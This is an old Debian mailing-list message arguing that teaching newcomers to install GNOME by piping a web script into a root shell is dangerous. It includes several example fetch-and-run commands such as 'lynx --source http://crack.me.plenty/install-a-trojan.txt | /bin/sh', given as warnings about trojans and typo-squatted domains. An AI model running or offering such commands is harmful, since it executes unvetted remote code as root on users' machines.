On Wed, Nov 01, 2000 at 01:33:45PM +0100, Peter Hugosson-Miller wrote: > Ethan Benson wrote: > > > teaching newbies how to run arbitrary code as root on there machine > > without having the slightest idea what it is going to do is a bad > > idea. the fact that this is targeted at newbies makes it WORSE. > > Well I'm certainly not advocating the above. All my suggestion did > was to provide a way _in_ to Debian, for someone who might be > interested in trying it out, but who isn't familiar with Linux. > There's almost nothing you've said in your mails that I don't agree > with - we're singing from the same hymn sheet, so to speak. well your advocating users run lynx --source | /bin/sh which is running arbitrary code from a web site as root. now going to the site looking at the shell script, downloading to a file running chmod +x and then running it is a bit less evil. [deletia] > > 5) newbie@mycomputer$ panel & > > Now we're getting somewhere... maybe this can be automated? Newbie > goes back to the books, finds out which files to edit. since when has debian been this bad? if you select the gnome stuff in tasksel or dselect you get a a working gnome desktop. > > Using go-gnome? Elapsed time 25 minutes. OK, newbie is still dumb, but > now has an opportunity to click around the system and find out stuff, > maybe even discover that Debian is better that 'doze! Newbie even gets > sawfish installed, so the GUI looks nicer still! now newbie goes wondering around on the web and finds a page saying c00l things will occur if they run lynx --source http://crack.me.plenty/install-a-trojan.txt | /bin/sh and they figure why not it worked for gnome! they might do it anyway even if htey never heard of that before but hopefully the fact of such a command being totally unknown they might hesitate long enough for that common sense thing to kick in. or lets say they accidently type lynx --source http://gognome.org | sh or go-gnome.net.... > Hear, hear! Never run arbitrary code from a web server as root!! Now > if the helix-gnome packages could just be incorporated into Debian, we > wouldn't even be having this discussion. it was recently challenged on -devel to point out exactly what is so unusable and broken about debian gnome, and you know what? nobody could answer that, other then a couple vague comments about a couple bugs being fixed and a purely subjective opinion that the lighter color tone selected by default in helix compared to debian was easier o the eyes. what is so special about helix? the truth is debian gnome is just fine and most certainly is good enough for said newbie to get along until they learn enough to install helix properly if so still want to. (maybe using debian gnome text editors to add apt lists) > To look at the script, just enter this url in your favourite web > browser: http://go-gnome.com/ so tell newbies to go look at it, save it, make it executable and then run it. don't make things too easy. otherwise they will soon become complacent and i can tell them `sure i can fix that problem, just run lynx --source http://www.alaska.net/~erbenson/install-this-trojan | /bin/sh that happily adds that inetd line i sarcasticlly mentioned earlier. (no such file exists don't worry) > And if the newbie can't get it installed at all, then he/she is also > kept from learning this new system. More money goes into B*ll G***s > pockets as newbie gives up and buys 'doze2K. bzzzt, debian gnome is right there in the tasksel window and despite popular belief its just fine. > I couldn't agree more! Long Live Linux! GNU/Linux ;-) -- Ethan Benson http://www.alaska.net/~erbenson/
Attachment:
pgpPwScDujyQR.pgp
Description: PGP signature